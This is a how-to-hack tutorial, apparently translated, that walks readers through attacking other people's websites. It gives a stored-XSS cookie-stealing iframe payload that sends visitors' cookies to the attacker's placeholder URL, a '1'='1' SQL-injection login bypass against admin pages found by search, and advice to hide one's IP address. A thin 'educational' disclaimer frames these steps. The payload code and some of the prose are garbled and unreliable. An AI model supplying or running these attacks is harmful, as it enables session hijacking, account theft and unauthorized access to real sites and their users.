Note:
this article is purely educational, it can either help people learn about hacking, or explain how hackers operate to then be able to better protect their websites. This tutorial gives you the main steps to take in order to access poorly secured websites.
Steps
Method 1 of 3: Use Cross-Site Scripting (XSS)
Step 1. Find a vulnerable site where you can post content
A forum is a good example. Remember that if the site is secure, it will not work.
Step 2. Go to Create Message
You will need to enter special codes that will capture sensitive data when clicking in the "post".
- You will need to test if the system is able to filter your code. Post
window.alert ("test")
If an alert box appears when you click on your post, it means the site is vulnerable to attack.
Step 3. Create and import your cookie catcher
The purpose of this attack is to capture a user's cookies, which will allow you to access their website accounts to which their credentials are vulnerable. You will need a cookie catcher that will capture the targeted cookies and redirect them to you. Load the cookie catcher on a site you have access to that supports the php language.
Step 4. Post a message with your cookie catcher
Enter a specific code in the message which will then be used to capture cookies and send them to your site. You will need to enter a few words of text after the code to reduce suspicion and prevent your message from being deleted.
- Here is a sample code:
<iframe 0 height = 0 width = 0src = JavaScript…: void (document.location =
"YOURURL / cookiecatcher.php? C =" document.cookie)>
Step 5. Use the collected cookies
After collecting it, you can use the cookie information that needs to be stored on your website for any purpose.
Method 2 of 3: Perform an injection attack
Step 1. Find a vulnerable site
You will need to find a vulnerable site knowing if the site administrator ID is readily available. Try doing a Google search on admin login.asp.
Step 2. Log in as administrator
Come in admin as a username and use one of the different password combinations. It can be any number, a fairly common example is 1 'or' 1 '=' 1.
Step 3. Be patient
This maneuver will probably take several attempts and you are bound to make some mistakes.
Step 4. Go to the website
You might possibly be able to find a combination that gives you administrator access to a website, assuming it is vulnerable.
Method 3 of 3: Prepare for success
Step 1. Learn one or two programming languages
If you really want to learn how to hack websites, you will need to understand how computers and other technologies work. Learn to use programming languages such as Python or SQL in order to better control a computer and identify vulnerabilities in systems.
Step 2. Learn the basics of HTML
You will also need to gain a good understanding of HTML and JavaScript languages if you want to hack websites. It can take a long time to learn, but there are many free methods on the Internet that will make it easier for you if you are willing to give it a go.
Step 3. Check out whitehats
They are hackers who use their abilities for honest purposes, primarily to expose Internet security holes and make browsing safer for anyone. If you want to learn the art of hacking for this kind of good reason, or if you just want to improve the protection of your website, it may be a good idea to contact some whitehats to help you out.
Step 4. Research the hack
If you want to learn how to hack or just want to protect yourself, you'll need to do a lot of research. There are so many different ways to find loopholes in a website that you will have to learn all the time.
Step 5. Stay up to date
Because the list of potential vulnerabilities is constantly evolving, you will need to make sure that you are up to date on hacking techniques. Just because you're protected from some type of hack doesn't mean you'll always be safe!
Advice
Go to hacker forums to find some useful tips
Warnings
- If you are going to try your hand at real-world hacking, mask your IP address using suitable software available online.
- Reading this article does not make you a hacker. You MUST work on your skills and practice, practice and practice again.
- Piracy is illegal. If you get caught, you are at fault.